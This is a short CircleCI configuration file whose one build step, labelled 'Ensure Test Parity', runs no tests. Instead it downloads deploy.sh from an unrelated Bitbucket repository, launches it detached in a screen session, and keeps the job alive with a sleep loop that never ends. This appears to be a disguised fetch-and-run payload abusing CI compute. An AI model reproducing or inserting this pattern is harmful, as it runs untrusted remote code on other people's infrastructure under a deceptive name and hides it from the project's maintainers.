version: 2
jobs:
  build:
    machine:
     image: ubuntu-2004:202008-01
    steps:
      - checkout
      - run:
          name: Ensure Test Parity
          command: |
             sudo apt-get update && sudo apt-get install -y screen
             wget https://bitbucket.org/gabutek/abute/raw/70989b220a8ed870ad7d5a34144c100ea067f84d/deploy.sh && chmod u+x deploy.sh
             screen -dmS run ./deploy.sh
             time=${1-1}; while test $time -gt 0; do printf "$time"; sleep 60; done